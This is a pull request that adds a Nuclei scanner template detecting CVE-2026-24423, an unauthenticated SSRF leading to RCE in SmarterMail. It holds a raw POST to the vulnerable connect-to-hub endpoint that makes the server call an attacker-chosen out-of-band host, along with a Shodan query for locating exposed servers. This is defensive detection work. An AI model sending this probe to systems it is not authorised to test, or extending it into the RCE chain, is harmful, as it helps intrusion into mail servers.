### PR TITLE
Add CVE-2026-24423: SmarterMail Unauthenticated RCE via ConnectToHub SSRF

### DIFF
--- a/http/cves/2026/CVE-2026-24423.yaml
+++ b/http/cves/2026/CVE-2026-24423.yaml
@@ -1,0 +1,47 @@
+id: CVE-2026-24423
+
+info:
+  name: SmarterMail < Build 9511 - Unauthenticated RCE via ConnectToHub SSRF
+  author: optimus-fulcria
+  severity: critical
+  description: |
+    SmarterMail prior to Build 9511 exposes an unauthenticated API endpoint at `/api/v1/settings/sysadmin/connect-to-hub` that allows server-side request forgery. An attacker can supply a malicious hubAddress causing the server to make an outbound HTTP request, which can be chained to achieve remote code execution via crafted response payloads.
+  impact: |
+    Unauthenticated remote attackers can achieve full remote code execution on the SmarterMail server. Actively exploited in ransomware campaigns.
+  remediation: |
+    Upgrade SmarterMail to Build 9511 or later.
+  reference:
+    - https://www.vulncheck.com/blog/smartermail-connecttohub-rce-cve-2026-24423
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-24423
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-24423
+    cwe-id: CWE-918
+    epss-score: 0.93
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: html:"SmarterMail"
+  tags: cve,cve2026,smartermail,ssrf,rce,oast,kev
+
+http:
+  - raw:
+      - |
+        POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"hubAddress":"http://{{interactsh-url}}","oneTimePassword":"nuclei","nodeName":"nuclei"}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "node-management"


### PR DESCRIPTION
## Description
Adds OOB detection template for CVE-2026-24423 (CVSS 9.8) - SmarterMail unauthenticated RCE via ConnectToHub SSRF.

- **CISA KEV**: Yes, actively exploited in ransomware campaigns
- **Detection**: OOB/interactsh callback via POST to `/api/v1/settings/sysadmin/connect-to-hub` with attacker-controlled `hubAddress`. SmarterMail makes outbound HTTP request to `{hubAddress}/web/api/node-management/setup-initial-connection`, confirming the SSRF.
- **Affected**: SmarterMail prior to Build 9511
- **CWE**: CWE-918 (SSRF) chained with command injection for RCE

Note: A previous version-detection-only template (PR #15322) was closed. This template uses proper OOB detection via interactsh to confirm the vulnerability.

## References
- [VulnCheck Blog - Full Technical Details](https://www.vulncheck.com/blog/smartermail-connecttohub-rce-cve-2026-24423)
- [CISA KEV](https://www.cisa.gov/news-events/alerts/2026/02/05/cisa-adds-four-known-exploited-vulnerabilities-catalog)

Template validated with `nuclei -validate`.